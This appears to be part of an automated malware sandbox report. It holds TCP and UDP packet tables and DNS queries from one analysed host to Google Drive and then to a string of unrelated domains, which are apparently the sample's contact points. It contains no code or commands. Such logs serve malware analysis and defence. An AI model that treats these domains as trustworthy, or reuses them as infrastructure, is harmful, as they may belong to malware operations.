                                                                                                May 27, 2024 12:38:02.120111942 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120234013 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120347023 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120428085 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.120471954 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120626926 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120661974 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.120737076 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:02.120923042 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.123199940 CEST4992580192.168.11.3079.98.25.1
                                                                                                May 27, 2024 12:38:02.330634117 CEST804992579.98.25.1192.168.11.30
                                                                                                May 27, 2024 12:38:07.137116909 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.326625109 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.326814890 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.328663111 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555200100 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555274010 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555304050 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555393934 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555444002 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555531979 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555625916 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555627108 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555689096 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555788994 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555814028 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555815935 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555875063 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.555948019 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.555996895 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.745125055 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745218039 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745347977 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745390892 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745425940 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.745534897 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.745621920 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745641947 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745708942 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745831966 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745882034 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:07.745913982 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.746004105 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.746200085 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.749001980 CEST4992680192.168.11.3064.190.62.22
                                                                                                May 27, 2024 12:38:07.938359976 CEST804992664.190.62.22192.168.11.30
                                                                                                May 27, 2024 12:38:12.760436058 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:12.946997881 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:12.947252035 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:12.948900938 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.134490013 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184134007 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184169054 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184323072 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184390068 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184406996 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.184416056 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184540987 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184557915 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.184716940 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184734106 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.184839010 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184853077 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.184916973 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.185049057 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.185097933 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.370116949 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370161057 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370213032 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370285034 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370404005 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370455980 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.370484114 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370508909 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.370539904 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370588064 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370600939 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370654106 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370726109 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.370779037 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370804071 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.370841026 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370852947 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370937109 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.370997906 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.371026993 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.371081114 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.371093035 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.371102095 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.371153116 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.371246099 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.371280909 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.371331930 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.371342897 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.371609926 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.556242943 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.556257963 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.556322098 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:13.556617022 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.560770988 CEST4992780192.168.11.303.73.27.108
                                                                                                May 27, 2024 12:38:13.746484995 CEST80499273.73.27.108192.168.11.30
                                                                                                May 27, 2024 12:38:23.742191076 CEST4992880192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:23.902092934 CEST8049928203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:23.902374983 CEST4992880192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:23.904166937 CEST4992880192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:24.064294100 CEST8049928203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:24.080528021 CEST8049928203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:24.080584049 CEST8049928203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:24.080878973 CEST4992880192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:24.084263086 CEST4992880192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:24.243983030 CEST8049928203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:29.100970030 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.290457964 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.290657043 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.292431116 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.519675016 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.519735098 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.519774914 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.519835949 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.519891024 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.519915104 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.519936085 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.519937992 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.519962072 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.520045996 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.520045996 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.520119905 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.520142078 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.520144939 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.520355940 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.709311008 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709388971 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709439993 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709465981 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709513903 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709549904 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.709572077 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709598064 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709621906 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709625006 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.709645987 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709695101 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:29.709729910 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.709983110 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.712253094 CEST4992980192.168.11.3091.195.240.123
                                                                                                May 27, 2024 12:38:29.901663065 CEST804992991.195.240.123192.168.11.30
                                                                                                May 27, 2024 12:38:34.724169970 CEST4993080192.168.11.30183.111.161.243
                                                                                                May 27, 2024 12:38:35.015665054 CEST8049930183.111.161.243192.168.11.30
                                                                                                May 27, 2024 12:38:35.015933990 CEST4993080192.168.11.30183.111.161.243
                                                                                                May 27, 2024 12:38:35.017544985 CEST4993080192.168.11.30183.111.161.243
                                                                                                May 27, 2024 12:38:35.308965921 CEST8049930183.111.161.243192.168.11.30
                                                                                                May 27, 2024 12:38:35.439846039 CEST8049930183.111.161.243192.168.11.30
                                                                                                May 27, 2024 12:38:35.439861059 CEST8049930183.111.161.243192.168.11.30
                                                                                                May 27, 2024 12:38:35.440340042 CEST4993080192.168.11.30183.111.161.243
                                                                                                May 27, 2024 12:38:35.442523003 CEST4993080192.168.11.30183.111.161.243
                                                                                                May 27, 2024 12:38:35.733767986 CEST8049930183.111.161.243192.168.11.30
                                                                                                May 27, 2024 12:38:40.457746029 CEST4993180192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:38:40.642927885 CEST80499313.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:38:40.643105030 CEST4993180192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:38:40.644901037 CEST4993180192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:38:40.829562902 CEST80499313.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:38:40.829694033 CEST80499313.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:38:40.829812050 CEST80499313.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:38:40.830116034 CEST4993180192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:38:40.832315922 CEST4993180192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:38:41.016949892 CEST80499313.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:38:53.126985073 CEST4993280192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:53.287604094 CEST8049932203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:53.287817001 CEST4993280192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:53.289335012 CEST4993280192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:53.449032068 CEST8049932203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:53.464199066 CEST8049932203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:53.464292049 CEST8049932203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:38:53.464485884 CEST4993280192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:53.466538906 CEST4993280192.168.11.30203.161.49.193
                                                                                                May 27, 2024 12:38:53.626229048 CEST8049932203.161.49.193192.168.11.30
                                                                                                May 27, 2024 12:39:04.375098944 CEST4993480192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:39:04.561301947 CEST80499343.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:39:04.561587095 CEST4993480192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:39:04.563126087 CEST4993480192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:39:04.748882055 CEST80499343.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:39:04.751271963 CEST80499343.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:39:04.751283884 CEST80499343.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:39:04.751636982 CEST4993480192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:39:04.753494978 CEST4993480192.168.11.303.64.163.50
                                                                                                May 27, 2024 12:39:04.939220905 CEST80499343.64.163.50192.168.11.30
                                                                                                May 27, 2024 12:39:09.762393951 CEST4993580192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:39:09.921441078 CEST8049935162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:39:09.921684980 CEST4993580192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:39:10.080826044 CEST8049935162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:39:10.080847979 CEST8049935162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:39:10.081190109 CEST4993580192.168.11.30162.209.189.152
                                                                                                May 27, 2024 12:39:10.240441084 CEST8049935162.209.189.152192.168.11.30
                                                                                                May 27, 2024 12:39:15.091025114 CEST4993680192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:15.194127083 CEST8049936208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:15.194478035 CEST4993680192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:15.195832014 CEST4993680192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:15.298780918 CEST8049936208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:15.303596020 CEST8049936208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:15.304313898 CEST8049936208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:15.304617882 CEST4993680192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:15.305903912 CEST4993680192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:15.408756971 CEST8049936208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:25.477857113 CEST4993780192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:25.580914974 CEST8049937208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:25.581168890 CEST4993780192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:25.582551956 CEST4993780192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:25.685435057 CEST8049937208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:25.689292908 CEST8049937208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:25.689719915 CEST8049937208.112.85.150192.168.11.30
                                                                                                May 27, 2024 12:39:25.689941883 CEST4993780192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:25.692254066 CEST4993780192.168.11.30208.112.85.150
                                                                                                May 27, 2024 12:39:25.795030117 CEST8049937208.112.85.150192.168.11.30

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                May 27, 2024 12:30:45.521362066 CEST5012653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:30:45.620655060 CEST53501261.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:30:46.133852959 CEST5251953192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:30:46.233309984 CEST53525191.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:31:16.282776117 CEST6353753192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:31:16.472201109 CEST53635371.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:31:31.725935936 CEST6203053192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:31:32.378120899 CEST53620301.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:31:46.035326004 CEST6210053192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:31:46.244266033 CEST53621001.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:32:00.001694918 CEST5919153192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:32:01.014178991 CEST5919153192.168.11.309.9.9.9
                                                                                                May 27, 2024 12:32:01.119860888 CEST53591911.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:32:01.588912964 CEST53591919.9.9.9192.168.11.30
                                                                                                May 27, 2024 12:32:15.091978073 CEST5627253192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:32:15.194726944 CEST53562721.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:32:23.246268034 CEST5364653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:32:23.599452972 CEST53536461.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:32:37.025110960 CEST6281753192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:32:37.175703049 CEST53628171.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:32:51.427910089 CEST5377353192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:32:52.254142046 CEST53537731.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:33:06.518184900 CEST5509953192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:33:06.778337002 CEST53550991.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:33:20.327215910 CEST5130153192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:33:20.599090099 CEST53513011.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:33:28.653513908 CEST5506953192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:33:29.165936947 CEST53550691.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:33:42.653534889 CEST5488753192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:33:42.803524017 CEST53548871.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:33:56.615910053 CEST6151553192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:33:56.816781044 CEST53615151.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:34:09.972378969 CEST6294653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:34:10.568295956 CEST53629461.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:34:23.955039024 CEST5245953192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:34:24.560374975 CEST53524591.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:34:38.778390884 CEST6230653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:34:38.884800911 CEST53623061.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:35:36.638319016 CEST6166553192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:35:36.740489960 CEST53616651.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:36:39.749198914 CEST5284653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:36:40.111711025 CEST53528461.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:36:48.170764923 CEST6221353192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:36:48.574687004 CEST53622131.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:02.136421919 CEST5006453192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:02.781204939 CEST53500641.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:16.148547888 CEST4960153192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:16.251353979 CEST53496011.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:37.690480947 CEST6400053192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:37.795667887 CEST53640001.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:37:50.890393019 CEST6239053192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:37:51.457040071 CEST53623901.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:38:18.570272923 CEST5873653192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:38:18.736293077 CEST53587361.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:38:45.845140934 CEST5686153192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:38:46.162926912 CEST53568611.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:38:58.483895063 CEST5189453192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:38:58.812975883 CEST53518941.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:39:04.233263016 CEST4976553192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:39:04.373385906 CEST53497651.1.1.1192.168.11.30
                                                                                                May 27, 2024 12:39:20.322813034 CEST6197253192.168.11.301.1.1.1
                                                                                                May 27, 2024 12:39:20.469120979 CEST53619721.1.1.1192.168.11.30

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                May 27, 2024 12:30:45.521362066 CEST192.168.11.301.1.1.10x9d98Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:30:46.133852959 CEST192.168.11.301.1.1.10x1c0aStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:31:16.282776117 CEST192.168.11.301.1.1.10xa112Standard query (0)www.fivetownsjcc.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:31:31.725935936 CEST192.168.11.301.1.1.10xd434Standard query (0)www.maxiwalls.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:31:46.035326004 CEST192.168.11.301.1.1.10xb0e6Standard query (0)www.donantedeovulos.spaceA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:00.001694918 CEST192.168.11.301.1.1.10x3ae2Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:01.014178991 CEST192.168.11.309.9.9.90x3ae2Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:15.091978073 CEST192.168.11.301.1.1.10x8f78Standard query (0)www.cookedatthebottom.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:23.246268034 CEST192.168.11.301.1.1.10x89efStandard query (0)www.funtechie.topA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:37.025110960 CEST192.168.11.301.1.1.10xd9c8Standard query (0)www.l7aeh.usA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:32:51.427910089 CEST192.168.11.301.1.1.10x309aStandard query (0)www.grimfilm.co.krA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:06.518184900 CEST192.168.11.301.1.1.10x943bStandard query (0)www.mindfreak.liveA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:20.327215910 CEST192.168.11.301.1.1.10xd11aStandard query (0)www.ntt.creditcardA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:28.653513908 CEST192.168.11.301.1.1.10x3bfcStandard query (0)www.avocatmh.orgA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:42.653534889 CEST192.168.11.301.1.1.10x942bStandard query (0)www.lm2ue.usA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:33:56.615910053 CEST192.168.11.301.1.1.10x3f70Standard query (0)www.noispisok.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:09.972378969 CEST192.168.11.301.1.1.10x37d4Standard query (0)www.578tt67.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:23.955039024 CEST192.168.11.301.1.1.10x9e5cStandard query (0)www.uhahiq.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:34:38.778390884 CEST192.168.11.301.1.1.10x1c21Standard query (0)www.weave.gameA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:35:36.638319016 CEST192.168.11.301.1.1.10x68a6Standard query (0)www.cookedatthebottom.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:36:39.749198914 CEST192.168.11.301.1.1.10xc6fStandard query (0)www.ntt.creditcardA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:36:48.170764923 CEST192.168.11.301.1.1.10x7fbeStandard query (0)www.wp-bits.onlineA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:02.136421919 CEST192.168.11.301.1.1.10x2d39Standard query (0)www.academynadpo.ruA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:16.148547888 CEST192.168.11.301.1.1.10x9612Standard query (0)www.quantumpowerlife.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:37.690480947 CEST192.168.11.301.1.1.10xc49bStandard query (0)www.osbornesargent.co.ukA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:37:50.890393019 CEST192.168.11.301.1.1.10xf45eStandard query (0)www.4-94.productionsA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:38:18.570272923 CEST192.168.11.301.1.1.10x3318Standard query (0)www.cookedatthebottom.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:38:45.845140934 CEST192.168.11.301.1.1.10x60d0Standard query (0)www.ntt.creditcardA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:38:58.483895063 CEST192.168.11.301.1.1.10x4b92Standard query (0)www.gast.com.plA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:39:04.233263016 CEST192.168.11.301.1.1.10x98f7Standard query (0)www.gaglianoart.comA (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:39:20.322813034 CEST192.168.11.301.1.1.10x3e3eStandard query (0)www.cookedatthebottom.comA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                May 27, 2024 12:30:45.620655060 CEST1.1.1.1192.168.11.300x9d98No error (0)drive.google.com142.251.16.101A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:30:45.620655060 CEST1.1.1.1192.168.11.300x9d98No error (0)drive.google.com142.251.16.113A (IP address)IN (0x0001)false
                                                                                                May 27, 2024 12:30:45.620655060 CEST1.1.1.1192.168.11.300x9d98No error (0)drive.google.com142.251.16.100A (IP address)IN (0x0001)false
